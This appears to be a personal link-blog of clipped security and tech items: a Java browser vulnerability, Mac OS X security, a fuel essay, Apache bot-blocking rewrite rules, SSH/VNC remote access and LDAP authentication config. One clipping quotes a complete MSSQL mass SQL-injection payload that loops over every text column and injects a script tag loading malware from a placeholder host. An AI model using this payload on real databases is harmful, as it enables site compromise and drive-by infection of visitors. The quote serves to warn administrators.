cr0 blog: Write once, own everyone, Java deserialization issues.
Interesting and scary details on a vulnerability for almost every modern browser out there (IE, Firefox, Safari, etc.) with Java Enabled. The fix: turn off Java. Sheesh!
I’m tryin’ ta think but nuthin’ happens!
cr0 blog: Write once, own everyone, Java deserialization issues.
Interesting and scary details on a vulnerability for almost every modern browser out there (IE, Firefox, Safari, etc.) with Java Enabled. The fix: turn off Java. Sheesh!
Here’s a sample of the type of SQL Injection MSSQL (and possibly Sybase) databases may be subjected to:
DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update [‘+@T+’] set [‘+@C +’]=[‘+@C+’]+â€â€></title><script src=â€http://www.domain.com/malware/ w.jsâ€></script><!–†where ‘+@C+’ not like â€%â€></title><script src=â€http://www.domain.com/malware/w.js “></script><!–â€â€™)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
 TrustedSource – Blog – New SQL Injection Attack Infecting Machines
Here’s a nice discussion on how to improve Mac OS X Security. It contains some dreams about what Mac OS X 10.6 Snow Leopard will bring.
How Snow Leopard can save Mac OS X from malware attacks | Zero Day | ZDNet.com
I, Cringely . The Pulpit . It’s the Platform, Stupid | PBS
Cars are the key to U.S. energy consumption. The dominant automotive platform here, whether you drive a truck, a car, or a motorcycle, relies on gasoline-fueled internal combustion engines. That’s the platform we are unlikely to change quickly. So how do we leave that platform intact and unchanged, ask nobody to significantly sacrifice, yet still achieve the noble (and Nobel) goals of lower fuel consumption, lower greenhouse gas emissions, lower pollution levels, dramatically lower oil consumption, lower cost, and lower geopolitical vulnerability for our country? There’s only one way I know to accomplish this: change the fuel.
This happened to a certain extent in Brazil during the ’70s and ’80s by embracing ethanol. But ethanol has less energy per gallon so fuel consumption goes up and mileage goes down. Ethanol can’t be shipped in pipelines also used for oil. Cars have to be modified to run on it and even then there are issues about internal corrosion. Ethanol is far from perfect. What’s needed is a replacement for gasoline that looks and feels and tastes just like gas to your car but isn’t made from oil. Then the platform could remain completely unchanged yet my 1966 Thunderbird (and the world) could benefit starting with the very next tankful.
There is such a fuel, developed by a husband and wife team of scientists working in Indiana in cooperation with Purdue University. This new fuel, called SwiftFuel, is right now intended for airplanes, not cars, but the lessons are the same.
How to nuke attackers via httpd.conf?That can be accomplished using mod_access “Deny from <envar>” with mod_setenvif testing REQUEST_URI or by using mod_rewrite:
RewriteRule (awstats.pl¦xmlrpc.php¦includer.cgi¦hints.pl)$ - [F]
Of course, the problem is that you’ll still be wasting bandwidth sending your custom 403 error page to these idiots.A work-around (stay with me here) is to do the following:Create a new subdirectory below web root.Place a custom 403 error page in that subdirectory. Lets call it “403.html” for now. Leave out all the HEAD content, and just put a few characters in this file, so you can recognize it by filesize when fetched — I use just the text “No.”Now create an .htaccess file in that subdirectory that contains the following:
ErrorDocument 403 /path_to_this_subdirectory/403.html
Options +FollowSymLinks
RewriteEngine onRewriteRule !^403.html$ - [F]
Now, instead of the first code snippet I posted above, use the following in httpd.conf or in your web root .htaccess file:
RewriteRule (awstats.pl¦xmlrpc.php¦includer.cgi¦hints.pl)$
/path_to_subdirectory/$1 [L]
Now when a bad-bot attempts to fetch one of those files, it gets rewritten to the subdirectory. But no files in that subdirectory are allowed to be fetched except for 403.html. So, the 403 error handler is invoked, and returns only a 403-Forbidden server response header and the three-byte response from 403.html, thus minimizing your bandwidth loss.
HOWTO Use Your Mac From Anywhere
This guide demonstrates using SSH tunnels and VNC screen-sharing software to use your Mac from any PC over the Internet. It’s fast, secure, cross-platform, and can be done entirely with open source software.
macosxhints.com – Authenticate Apache 2 using Mac OS X Open Directory
Change this:
cn=user1,dn=example,dn=com
to this:
uid=user1,dn=example,dn=com
so it looks like this:
AuthType Basic
AuthName "Testing of LDAP auth"
AuthBasicProvider ldap
AuthzLDAPAuthoritative on
AuthLDAPBindDN uid=testaccount1,cn=users,dc=geo,dc=vuw,dc=ac,dc=nz
AuthLDAPBindPassword [plaintext password for user 'testaccount1']
AuthLDAPURL ldap://server1.geo.vuw.ac.nz/dc=geo,dc=vuw,dc=ac,dc=nz
require valid-user
Clear as mud
? 😉
Plugin update & security / privacy – wp-hackers | Google Groups
I think the Penguins said it best… Interesting… but at least there are plugins and such to overcome… This was a bit of FUD, but it is interesting to find out about how Akismet sends $_SERVER configs to the mothership…
Any set of characters » Fun with comment spammers..
And I thought I hated spammers…
macosxhints.com – A shell script to upload SSH keys to remote machines
This is a fairly useful script to upload ssh authorized keys to remote servers.